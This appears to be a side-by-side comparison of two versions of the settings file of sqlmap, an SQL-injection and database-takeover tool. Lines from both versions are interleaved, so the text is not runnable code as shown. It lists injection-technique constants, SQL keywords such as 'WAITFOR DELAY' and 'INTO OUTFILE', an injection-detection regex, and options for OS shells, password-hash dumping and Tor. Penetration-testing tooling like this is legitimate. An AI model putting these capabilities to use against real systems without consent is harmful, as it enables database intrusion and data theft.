||||||
|
DESCRIPTION = "automatic SQL injection and database takeover tool"
|
||||||
|
SITE = "http://sqlmap.org"
|
||||||
|
ISSUES_PAGE = "https://github.com/sqlmapproject/sqlmap/issues/new"
|
||||||
|
GIT_REPOSITORY = "git://github.com/sqlmapproject/sqlmap.git"
|
||||||
|
GIT_PAGE = "https://github.com/sqlmapproject/sqlmap"
|
||||||
|
|
||||||
# sqlmap logger
|
# colorful banner
|
||||||
logging.addLevelName(9, "TRAFFIC OUT")
|
BANNER = """\033[01;33m _
|
||||||
logging.addLevelName(8, "TRAFFIC IN")
|
___ ___| |_____ ___ ___ \033[01;37m{\033[01;%dm%s\033[01;37m}\033[01;33m
|
||||||
LOGGER = logging.getLogger("sqlmapLog")
|
|_ -| . | | | .'| . |
|
||||||
LOGGER_HANDLER = logging.StreamHandler(sys.stdout)
|
|___|_ |_|_|_|_|__,| _|
|
||||||
FORMATTER = logging.Formatter("[%(asctime)s] [%(levelname)s] %(message)s", "%H:%M:%S")
|
|_| |_| \033[0m\033[4;37m%s\033[0m\n
|
||||||
|
""" % ((31 + hash(VERSION) % 6) if not STABLE else 30, VERSION_STRING.split('/')[-1], SITE)
|
||||||
|
|
||||||
LOGGER_HANDLER.setFormatter(FORMATTER)
|
# Minimum distance of ratio from kb.matchRatio to result in True
|
||||||
LOGGER.addHandler(LOGGER_HANDLER)
|
DIFF_TOLERANCE = 0.05
|
||||||
LOGGER.setLevel(logging.WARN)
|
CONSTANT_RATIO = 0.9
|
||||||
|
|
||||||
# Url to update Microsoft SQL Server XML versions file from
|
# Ratio used in heuristic check for WAF/IDS/IPS protected targets
|
||||||
MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx"
|
IDS_WAF_CHECK_RATIO = 0.5
|
||||||
|
|
||||||
# Url to update sqlmap from
|
# Timeout used in heuristic check for WAF/IDS/IPS protected targets
|
||||||
SQLMAP_VERSION_URL = "%s/doc/VERSION" % SITE
|
IDS_WAF_CHECK_TIMEOUT = 10
|
||||||
SQLMAP_SOURCE_URL = "http://downloads.sourceforge.net/sqlmap/sqlmap-%s.zip"
|
|
||||||
|
|
||||||
# Database managemen system specific variables
|
# Lower and upper values for match ratio in case of stable page
|
||||||
MSSQL_SYSTEM_DBS = ( "Northwind", "model", "msdb", "pubs", "tempdb" )
|
LOWER_RATIO_BOUND = 0.02
|
||||||
MYSQL_SYSTEM_DBS = ( "information_schema", "mysql" ) # Before MySQL 5.0 only "mysql"
|
UPPER_RATIO_BOUND = 0.98
|
||||||
PGSQL_SYSTEM_DBS = ( "information_schema", "pg_catalog" )
|
|
||||||
ORACLE_SYSTEM_DBS = ( "SYSTEM", "SYSAUX" ) # These are TABLESPACE_NAME
|
|
||||||
|
|
||||||
MSSQL_ALIASES = [ "microsoft sql server", "mssqlserver", "mssql", "ms" ]
|
# Markers for special cases when parameter values contain html encoded characters
|
||||||
MYSQL_ALIASES = [ "mysql", "my" ]
|
PARAMETER_AMP_MARKER = "__AMP__"
|
||||||
PGSQL_ALIASES = [ "postgresql", "postgres", "pgsql", "psql", "pg" ]
|
PARAMETER_SEMICOLON_MARKER = "__SEMICOLON__"
|
||||||
ORACLE_ALIASES = [ "oracle", "orcl", "ora", "or" ]
|
BOUNDARY_BACKSLASH_MARKER = "__BACKSLASH__"
|
||||||
|
PARTIAL_VALUE_MARKER = "__PARTIAL_VALUE__"
|
||||||
|
PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
||||||
|
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
||||||
|
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
||||||
|
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
||||||
|
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||||
|
|
||||||
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES
|
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||||
|
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||||
|
|
||||||
# TODO: port to command line/configuration file options?
|
PAYLOAD_DELIMITER = "__PAYLOAD_DELIMITER__"
|
||||||
SECONDS = 5
|
CHAR_INFERENCE_MARK = "%c"
|
||||||
RETRIES = 3
|
PRINTABLE_CHAR_REGEX = r"[^\x00-\x1f\x7f-\xff]"
|
||||||
|
|
||||||
|
# Regular expression used for extraction of table names (useful for (e.g.) MsAccess)
|
||||||
|
SELECT_FROM_TABLE_REGEX = r"\bSELECT .+? FROM (?P<result>[\w.]+)\b"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of textual content-type
|
||||||
|
TEXT_CONTENT_TYPE_REGEX = r"(?i)(text|form|message|xml|javascript|ecmascript|json)"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of generic permission messages
|
||||||
|
PERMISSION_DENIED_REGEX = r"(command|permission|access)\s*(was|is)?\s*denied"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of generic maximum connection messages
|
||||||
|
MAX_CONNECTIONS_REGEX = r"max.+connections"
|
||||||
|
|
||||||
|
# Regular expression used for extracting results from Google search
|
||||||
|
GOOGLE_REGEX = r"webcache\.googleusercontent\.com/search\?q=cache:[^:]+:([^+]+)\+&cd=|url\?\w+=((?![^>]+webcache\.googleusercontent\.com)http[^>]+)&(sa=U|rct=j)"
|
||||||
|
|
||||||
|
# Regular expression used for extracting results from DuckDuckGo search
|
||||||
|
DUCKDUCKGO_REGEX = r'"u":"([^"]+)'
|
||||||
|
|
||||||
|
# Regular expression used for extracting results from Disconnect Search
|
||||||
|
DISCONNECT_SEARCH_REGEX = r'<p class="url wrapword">([^<]+)</p>'
|
||||||
|
|
||||||
|
# Dummy user agent for search (if default one returns different results)
|
||||||
|
DUMMY_SEARCH_USER_AGENT = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0"
|
||||||
|
|
||||||
|
# Regular expression used for extracting content from "textual" tags
|
||||||
|
TEXT_TAG_REGEX = r"(?si)<(abbr|acronym|b|blockquote|br|center|cite|code|dt|em|font|h\d|i|li|p|pre|q|strong|sub|sup|td|th|title|tt|u)(?!\w).*?>(?P<result>[^<]+)"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of IP addresses
|
||||||
|
IP_ADDRESS_REGEX = r"\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b"
|
||||||
|
|
||||||
|
# Regular expression used for recognition of generic "your ip has been blocked" messages
|
||||||
|
BLOCKED_IP_REGEX = r"(?i)(\A|\b)ip\b.*\b(banned|blocked|block list|firewall)"
|
||||||
|
|
||||||
|
# Dumping characters used in GROUP_CONCAT MySQL technique
|
||||||
|
CONCAT_ROW_DELIMITER = ','
|
||||||
|
CONCAT_VALUE_DELIMITER = '|'
|
||||||
|
|
||||||
|
# Coefficient used for a time-based query delay checking (must be >= 7)
|
||||||
|
TIME_STDEV_COEFF = 7
|
||||||
|
|
||||||
|
# Minimum response time that can be even considered as delayed (not a complete requirement)
|
||||||
|
MIN_VALID_DELAYED_RESPONSE = 0.5
|
||||||
|
|
||||||
|
# Standard deviation after which a warning message should be displayed about connection lags
|
||||||
|
WARN_TIME_STDEV = 0.5
|
||||||
|
|
||||||
|
# Minimum length of usable union injected response (quick defense against substr fields)
|
||||||
|
UNION_MIN_RESPONSE_CHARS = 10
|
||||||
|
|
||||||
|
# Coefficient used for a union-based number of columns checking (must be >= 7)
|
||||||
|
UNION_STDEV_COEFF = 7
|
||||||
|
|
||||||
|
# Length of queue for candidates for time delay adjustment
|
||||||
|
TIME_DELAY_CANDIDATES = 3
|
||||||
|
|
||||||
|
# Default value for HTTP Accept header
|
||||||
|
HTTP_ACCEPT_HEADER_VALUE = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
|
||||||
|
|
||||||
|
# Default value for HTTP Accept-Encoding header
|
||||||
|
HTTP_ACCEPT_ENCODING_HEADER_VALUE = "gzip,deflate"
|
||||||
|
|
||||||
|
# Default timeout for running commands over backdoor
|
||||||
|
BACKDOOR_RUN_CMD_TIMEOUT = 5
|
||||||
|
|
||||||
|
# Number of seconds to wait for thread finalization at program end
|
||||||
|
THREAD_FINALIZATION_TIMEOUT = 1
|
||||||
|
|
||||||
|
# Maximum number of techniques used in inject.py/getValue() per one value
|
||||||
|
MAX_TECHNIQUES_PER_VALUE = 2
|
||||||
|
|
||||||
|
# In case of missing piece of partial union dump, buffered array must be flushed after certain size
|
||||||
|
MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
|
||||||
|
|
||||||
|
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
||||||
|
METADB_SUFFIX = "_masterdb"
|
||||||
|
|
||||||
|
# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt)
|
||||||
|
PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
|
||||||
|
|
||||||
|
# Minimum time response set needed for time-comparison based on standard deviation
|
||||||
|
MIN_TIME_RESPONSES = 30
|
||||||
|
|
||||||
|
# Minimum comparison ratio set needed for searching valid union column number based on standard deviation
|
||||||
|
MIN_UNION_RESPONSES = 5
|
||||||
|
|
||||||
|
# After these number of blanks at the end inference should stop (just in case)
|
||||||
|
INFERENCE_BLANK_BREAK = 10
|
||||||
|
|
||||||
|
# Use this replacement character for cases when inference is not able to retrieve the proper character value
|
||||||
|
INFERENCE_UNKNOWN_CHAR = '?'
|
||||||
|
|
||||||
|
# Character used for operation "greater" in inference
|
||||||
|
INFERENCE_GREATER_CHAR = ">"
|
||||||
|
|
||||||
|
# Character used for operation "equals" in inference
|
||||||
|
INFERENCE_EQUALS_CHAR = "="
|
||||||
|
|
||||||
|
# Character used for operation "not-equals" in inference
|
||||||
|
INFERENCE_NOT_EQUALS_CHAR = "!="
|
||||||
|
|
||||||
|
# String used for representation of unknown DBMS
|
||||||
|
UNKNOWN_DBMS = "Unknown"
|
||||||
|
|
||||||
|
# String used for representation of unknown DBMS version
|
||||||
|
UNKNOWN_DBMS_VERSION = "Unknown"
|
||||||
|
|
||||||
|
# Dynamicity mark length used in dynamicity removal engine
|
||||||
|
DYNAMICITY_MARK_LENGTH = 32
|
||||||
|
|
||||||
|
# Dummy user prefix used in dictionary attack
|
||||||
|
DUMMY_USER_PREFIX = "__dummy__"
|
||||||
|
|
||||||
|
# Reference: http://en.wikipedia.org/wiki/ISO/IEC_8859-1
|
||||||
|
DEFAULT_PAGE_ENCODING = "iso-8859-1"
|
||||||
|
|
||||||
|
# URL used in dummy runs
|
||||||
|
DUMMY_URL = "http://foo/bar?id=1"
|
||||||
|
|
||||||
|
# System variables
|
||||||
|
IS_WIN = subprocess.mswindows
|
||||||
|
|
||||||
|
# The name of the operating system dependent module imported. The following names have currently been registered: 'posix', 'nt', 'mac', 'os2', 'ce', 'java', 'riscos'
|
||||||
|
PLATFORM = os.name
|
||||||
|
PYVERSION = sys.version.split()[0]
|
||||||
|
|
||||||
|
# DBMS system databases
|
||||||
|
MSSQL_SYSTEM_DBS = ("Northwind", "master", "model", "msdb", "pubs", "tempdb")
|
||||||
|
MYSQL_SYSTEM_DBS = ("information_schema", "mysql") # Before MySQL 5.0 only "mysql"
|
||||||
|
PGSQL_SYSTEM_DBS = ("information_schema", "pg_catalog", "pg_toast")
|
||||||
|
ORACLE_SYSTEM_DBS = ("CTXSYS", "DBSNMP", "DMSYS", "EXFSYS", "MDSYS", "OLAPSYS", "ORDSYS", "OUTLN", "SYS", "SYSAUX", "SYSMAN", "SYSTEM", "TSMSYS", "WMSYS", "XDB") # These are TABLESPACE_NAME
|
||||||
|
SQLITE_SYSTEM_DBS = ("sqlite_master", "sqlite_temp_master")
|
||||||
|
ACCESS_SYSTEM_DBS = ("MSysAccessObjects", "MSysACEs", "MSysObjects", "MSysQueries", "MSysRelationships", "MSysAccessStorage",\
|
||||||
|
"MSysAccessXML", "MSysModules", "MSysModules2")
|
||||||
|
FIREBIRD_SYSTEM_DBS = ("RDB$BACKUP_HISTORY", "RDB$CHARACTER_SETS", "RDB$CHECK_CONSTRAINTS", "RDB$COLLATIONS", "RDB$DATABASE",\
|
||||||
|
"RDB$DEPENDENCIES", "RDB$EXCEPTIONS", "RDB$FIELDS", "RDB$FIELD_DIMENSIONS", " RDB$FILES", "RDB$FILTERS",\
|
||||||
|
"RDB$FORMATS", "RDB$FUNCTIONS", "RDB$FUNCTION_ARGUMENTS", "RDB$GENERATORS", "RDB$INDEX_SEGMENTS", "RDB$INDICES",\
|
||||||
|
"RDB$LOG_FILES", "RDB$PAGES", "RDB$PROCEDURES", "RDB$PROCEDURE_PARAMETERS", "RDB$REF_CONSTRAINTS", "RDB$RELATIONS",\
|
||||||
|
"RDB$RELATION_CONSTRAINTS", "RDB$RELATION_FIELDS", "RDB$ROLES", "RDB$SECURITY_CLASSES", "RDB$TRANSACTIONS", "RDB$TRIGGERS",\
|
||||||
|
"RDB$TRIGGER_MESSAGES", "RDB$TYPES", "RDB$USER_PRIVILEGES", "RDB$VIEW_RELATIONS")
|
||||||
|
MAXDB_SYSTEM_DBS = ("SYSINFO", "DOMAIN")
|
||||||
|
SYBASE_SYSTEM_DBS = ("master", "model", "sybsystemdb", "sybsystemprocs")
|
||||||
|
DB2_SYSTEM_DBS = ("NULLID", "SQLJ", "SYSCAT", "SYSFUN", "SYSIBM", "SYSIBMADM", "SYSIBMINTERNAL", "SYSIBMTS",\
|
||||||
|
"SYSPROC", "SYSPUBLIC", "SYSSTAT", "SYSTOOLS")
|
||||||
|
HSQLDB_SYSTEM_DBS = ("INFORMATION_SCHEMA", "SYSTEM_LOB")
|
||||||
|
|
||||||
|
MSSQL_ALIASES = ("microsoft sql server", "mssqlserver", "mssql", "ms")
|
||||||
|
MYSQL_ALIASES = ("mysql", "my")
|
||||||
|
PGSQL_ALIASES = ("postgresql", "postgres", "pgsql", "psql", "pg")
|
||||||
|
ORACLE_ALIASES = ("oracle", "orcl", "ora", "or")
|
||||||
|
SQLITE_ALIASES = ("sqlite", "sqlite3")
|
||||||
|
ACCESS_ALIASES = ("msaccess", "access", "jet", "microsoft access")
|
||||||
|
FIREBIRD_ALIASES = ("firebird", "mozilla firebird", "interbase", "ibase", "fb")
|
||||||
|
MAXDB_ALIASES = ("maxdb", "sap maxdb", "sap db")
|
||||||
|
SYBASE_ALIASES = ("sybase", "sybase sql server")
|
||||||
|
DB2_ALIASES = ("db2", "ibm db2", "ibmdb2")
|
||||||
|
HSQLDB_ALIASES = ("hsql", "hsqldb", "hs", "hypersql")
|
||||||
|
|
||||||
|
DBMS_DIRECTORY_DICT = dict((getattr(DBMS, _), getattr(DBMS_DIRECTORY_NAME, _)) for _ in dir(DBMS) if not _.startswith("_"))
|
||||||
|
|
||||||
|
SUPPORTED_DBMS = MSSQL_ALIASES + MYSQL_ALIASES + PGSQL_ALIASES + ORACLE_ALIASES + SQLITE_ALIASES + ACCESS_ALIASES + FIREBIRD_ALIASES + MAXDB_ALIASES + SYBASE_ALIASES + DB2_ALIASES + HSQLDB_ALIASES
|
||||||
|
SUPPORTED_OS = ("linux", "windows")
|
||||||
|
|
||||||
|
DBMS_ALIASES = ((DBMS.MSSQL, MSSQL_ALIASES), (DBMS.MYSQL, MYSQL_ALIASES), (DBMS.PGSQL, PGSQL_ALIASES), (DBMS.ORACLE, ORACLE_ALIASES), (DBMS.SQLITE, SQLITE_ALIASES), (DBMS.ACCESS, ACCESS_ALIASES), (DBMS.FIREBIRD, FIREBIRD_ALIASES), (DBMS.MAXDB, MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES))
|
||||||
|
|
||||||
|
USER_AGENT_ALIASES = ("ua", "useragent", "user-agent")
|
||||||
|
REFERER_ALIASES = ("ref", "referer", "referrer")
|
||||||
|
HOST_ALIASES = ("host",)
|
||||||
|
|
||||||
|
HSQLDB_DEFAULT_SCHEMA = "PUBLIC"
|
||||||
|
|
||||||
|
# Names that can't be used to name files on Windows OS
|
||||||
|
WINDOWS_RESERVED_NAMES = ("CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9")
|
||||||
|
|
||||||
|
# Items displayed in basic help (-h) output
|
||||||
|
BASIC_HELP_ITEMS = (
|
||||||
|
"url",
|
||||||
|
"googleDork",
|
||||||
|
"data",
|
||||||
|
"cookie",
|
||||||
|
"randomAgent",
|
||||||
|
"proxy",
|
||||||
|
"testParameter",
|
||||||
|
"dbms",
|
||||||
|
"level",
|
||||||
|
"risk",
|
||||||
|
"tech",
|
||||||
|
"getAll",
|
||||||
|
"getBanner",
|
||||||
|
"getCurrentUser",
|
||||||
|
"getCurrentDb",
|
||||||
|
"getPasswordHashes",
|
||||||
|
"getTables",
|
||||||
|
"getColumns",
|
||||||
|
"getSchema",
|
||||||
|
"dumpTable",
|
||||||
|
"dumpAll",
|
||||||
|
"db",
|
||||||
|
"tbl",
|
||||||
|
"col",
|
||||||
|
"osShell",
|
||||||
|
"osPwn",
|
||||||
|
"batch",
|
||||||
|
"checkTor",
|
||||||
|
"flushSession",
|
||||||
|
"tor",
|
||||||
|
"sqlmapShell",
|
||||||
|
"wizard",
|
||||||
|
)
|
||||||
|
|
||||||
|
# String representation for NULL value
|
||||||
|
NULL = "NULL"
|
||||||
|
|
||||||
|
# String representation for blank ('') value
|
||||||
|
BLANK = "<blank>"
|
||||||
|
|
||||||
|
# String representation for current database
|
||||||
|
CURRENT_DB = "CD"
|
||||||
|
|
||||||
|
# Regular expressions used for finding file paths in error messages
|
||||||
|
FILE_PATH_REGEXES = (r" in (file )?<b>(?P<result>.*?)</b> on line", r"(?:[>(\[\s])(?P<result>[A-Za-z]:[\\/][\w.\\/-]*)", r"(?:[>(\[\s])(?P<result>/\w[/\w.-]+)", r"href=['\"]file://(?P<result>/[^'\"]+)")
|
||||||
|
|
||||||
|
# Regular expressions used for parsing error messages (--parse-errors)
|
||||||
|
ERROR_PARSING_REGEXES = (
|
||||||
|
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
|
||||||
|
r"(?m)^(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
|
||||||
|
r"<li>Error Type:<br>(?P<result>.+?)</li>",
|
||||||
|
r"error '[0-9a-f]{8}'((<[^>]+>)|\s)+(?P<result>[^<>]+)",
|
||||||
|
r"(?m)^\s*\[[^\n]+(ODBC|JDBC)[^\n]+\](?P<result>[^\]]+in query expression[^\n]+)$"
|
||||||
|
)
|
||||||
|
|
||||||
|
# Regular expression used for parsing charset info from meta html headers
|
||||||
|
META_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset="?(?P<result>[^"> ]+).*</head>'
|
||||||
|
|
||||||
|
# Regular expression used for parsing refresh info from meta html headers
|
||||||
|
META_REFRESH_REGEX = r'(?si)<head>(?!.*?<noscript.*?</head).*?<meta http-equiv="?refresh"?[^>]+content="?[^">]+url=["\']?(?P<result>[^\'">]+).*</head>'
|
||||||
|
|
||||||
|
# Regular expression used for parsing empty fields in tested form data
|
||||||
|
EMPTY_FORM_FIELDS_REGEX = r'(&|\A)(?P<result>[^=]+=(&|\Z))'
|
||||||
|
|
||||||
|
# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf
|
||||||
|
COMMON_PASSWORD_SUFFIXES = ("1", "123", "2", "12", "3", "13", "7", "11", "5", "22", "23", "01", "4", "07", "21", "14", "10", "06", "08", "8", "15", "69", "16", "6", "18")
|
||||||
|
|
||||||
|
# Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html
|
||||||
|
COMMON_PASSWORD_SUFFIXES += ("!", ".", "*", "!!", "?", ";", "..", "!!!", ", ", "@")
|
||||||
|
|
||||||
|
# Splitter used between requests in WebScarab log files
|
||||||
|
WEBSCARAB_SPLITTER = "### Conversation"
|
||||||
|
|
||||||
|
# Splitter used between requests in BURP log files
|
||||||
|
BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
|
||||||
|
|
||||||
|
# Regex used for parsing XML Burp saved history items
|
||||||
|
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||||
|
|
||||||
|
# Encoding used for Unicode data
|
||||||
|
UNICODE_ENCODING = "utf8"
|
||||||
|
|
||||||
|
# Reference: http://www.w3.org/Protocols/HTTP/Object_Headers.html#uri
|
||||||
|
URI_HTTP_HEADER = "URI"
|
||||||
|
|
||||||
|
# Uri format which could be injectable (e.g. www.site.com/id82)
|
||||||
|
URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
|
||||||
|
|
||||||
|
# Regex used for masking sensitive data
|
||||||
|
SENSITIVE_DATA_REGEX = "(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
|
||||||
|
|
||||||
|
# Maximum number of threads (avoiding connection issues and/or DoS)
|
||||||
|
MAX_NUMBER_OF_THREADS = 10
|
||||||
|
|
||||||
|
# Minimum range between minimum and maximum of statistical set
|
||||||
|
MIN_STATISTICAL_RANGE = 0.01
|
||||||
|
|
||||||
|
# Minimum value for comparison ratio
|
||||||
|
MIN_RATIO = 0.0
|
||||||
|
|
||||||
|
# Maximum value for comparison ratio
|
||||||
|
MAX_RATIO = 1.0
|
||||||
|
|
||||||
|
# Character used for marking injectable position inside provided data
|
||||||
|
CUSTOM_INJECTION_MARK_CHAR = '*'
|
||||||
|
|
||||||
|
# Other way to declare injection position
|
||||||
|
INJECT_HERE_MARK = '%INJECT HERE%'
|
||||||
|
|
||||||
|
# Minimum chunk length used for retrieving data over error based payloads
|
||||||
|
MIN_ERROR_CHUNK_LENGTH = 8
|
||||||
|
|
||||||
|
# Maximum chunk length used for retrieving data over error based payloads
|
||||||
|
MAX_ERROR_CHUNK_LENGTH = 1024
|
||||||
|
|
||||||
|
# Do not escape the injected statement if it contains any of the following SQL keywords
|
||||||
|
EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ", "'%s'" % CHAR_INFERENCE_MARK)
|
||||||
|
|
||||||
|
# Mark used for replacement of reflected values
|
||||||
|
REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
|
||||||
|
|
||||||
|
# Regular expression used for replacing border non-alphanum characters
|
||||||
|
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
|
||||||
|
|
||||||
|
# Regular expression used for replacing non-alphanum characters
|
||||||
|
REFLECTED_REPLACEMENT_REGEX = r".+"
|
||||||
|
|
||||||
|
# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)
|
||||||
|
REFLECTED_MAX_REGEX_PARTS = 10
|
||||||
|
|
||||||
|
# Chars which can be used as a failsafe values in case of too long URL encoding value
|
||||||
|
URLENCODE_FAILSAFE_CHARS = "()|,"
|
||||||
|
|
||||||
|
# Maximum length of URL encoded value after which failsafe procedure takes away
|
||||||
|
URLENCODE_CHAR_LIMIT = 2000
|
||||||
|
|
||||||
|
# Default schema for Microsoft SQL Server DBMS
|
||||||
|
DEFAULT_MSSQL_SCHEMA = "dbo"
|
||||||
|
|
||||||
|
# Display hash attack info every mod number of items
|
||||||
|
HASH_MOD_ITEM_DISPLAY = 11
|
||||||
|
|
||||||
|
# Maximum integer value
|
||||||
|
MAX_INT = sys.maxint
|
||||||
|
|
||||||
|
# Options that need to be restored in multiple targets run mode
|
||||||
|
RESTORE_MERGED_OPTIONS = ("col", "db", "dnsName", "privEsc", "tbl", "regexp", "string", "textOnly", "threads", "timeSec", "tmpPath", "uChar", "user")
|
||||||
|
|
||||||
|
# Parameters to be ignored in detection phase (upper case)
|
||||||
|
IGNORE_PARAMETERS = ("__VIEWSTATE", "__VIEWSTATEENCRYPTED", "__EVENTARGUMENT", "__EVENTTARGET", "__EVENTVALIDATION", "ASPSESSIONID", "ASP.NET_SESSIONID", "JSESSIONID", "CFID", "CFTOKEN")
|
||||||
|
|
||||||
|
# Regular expression used for recognition of ASP.NET control parameters
|
||||||
|
ASP_NET_CONTROL_REGEX = r"(?i)\Actl\d+\$"
|
||||||
|
|
||||||
|
# Prefix for Google analytics cookie names
|
||||||
|
GOOGLE_ANALYTICS_COOKIE_PREFIX = "__UTM"
|
||||||
|
|
||||||
|
# Prefix for configuration overriding environment variables
|
||||||
|
SQLMAP_ENVIRONMENT_PREFIX = "SQLMAP_"
|
||||||
|
|
||||||
|
# Turn off resume console info to avoid potential slowdowns
|
||||||
|
TURN_OFF_RESUME_INFO_LIMIT = 20
|
||||||
|
|
||||||
|
# Strftime format for results file used in multiple target mode
|
||||||
|
RESULTS_FILE_FORMAT = "results-%m%d%Y_%I%M%p.csv"
|
||||||
|
|
||||||
|
# Official web page with the list of Python supported codecs
|
||||||
|
CODECS_LIST_PAGE = "http://docs.python.org/library/codecs.html#standard-encodings"
|
||||||
|
|
||||||
|
# Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition)
|
||||||
|
SQL_SCALAR_REGEX = r"\A(SELECT(?!\s+DISTINCT\(?))?\s*\w*\("
|
||||||
|
|
||||||
|
# Option/switch values to ignore during configuration save
|
||||||
|
IGNORE_SAVE_OPTIONS = ("saveConfig",)
|
||||||
|
|
||||||
|
# IP address of the localhost
|
||||||
|
LOCALHOST = "127.0.0.1"
|
||||||
|
|
||||||
|
# Default port used by Tor
|
||||||
|
DEFAULT_TOR_SOCKS_PORT = 9050
|
||||||
|
|
||||||
|
# Default ports used in Tor proxy bundles
|
||||||
|
DEFAULT_TOR_HTTP_PORTS = (8123, 8118)
|
||||||
|
|
||||||
|
# Percentage below which comparison engine could have problems
|
||||||
|
LOW_TEXT_PERCENT = 20
|
||||||
|
|
||||||
|
# These MySQL keywords can't go (alone) into versioned comment form (/*!...*/)
|
||||||
|
# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html
|
||||||
|
IGNORE_SPACE_AFFECTED_KEYWORDS = ("CAST", "COUNT", "EXTRACT", "GROUP_CONCAT", "MAX", "MID", "MIN", "SESSION_USER", "SUBSTR", "SUBSTRING", "SUM", "SYSTEM_USER", "TRIM")
|
||||||
|
|
||||||
|
LEGAL_DISCLAIMER = "Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
|
||||||
|
|
||||||
|
# After this number of misses reflective removal mechanism is turned off (for speed up reasons)
|
||||||
|
REFLECTIVE_MISS_THRESHOLD = 20
|
||||||
|
|
||||||
|
# Regular expression used for extracting HTML title
|
||||||
|
HTML_TITLE_REGEX = "<title>(?P<result>[^<]+)</title>"
|
||||||
|
|
||||||
|
# Table used for Base64 conversion in WordPress hash cracking routine
|
||||||
|
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
|
||||||
|
|
||||||
|
PICKLE_REDUCE_WHITELIST = (types.BooleanType, types.DictType, types.FloatType, types.IntType, types.ListType, types.LongType, types.NoneType, types.StringType, types.TupleType, types.UnicodeType, types.XRangeType, type(AttribDict()), type(set()))
|
||||||
|
|
||||||
|
# Chars used to quickly distinguish if the user provided tainted parameter values
|
||||||
|
DUMMY_SQL_INJECTION_CHARS = ";()'"
|
||||||
|
|
||||||
|
# Simple check against dummy users
|
||||||
|
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
|
||||||
|
|
||||||
|
# Extensions skipped by crawler
|
||||||
|
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 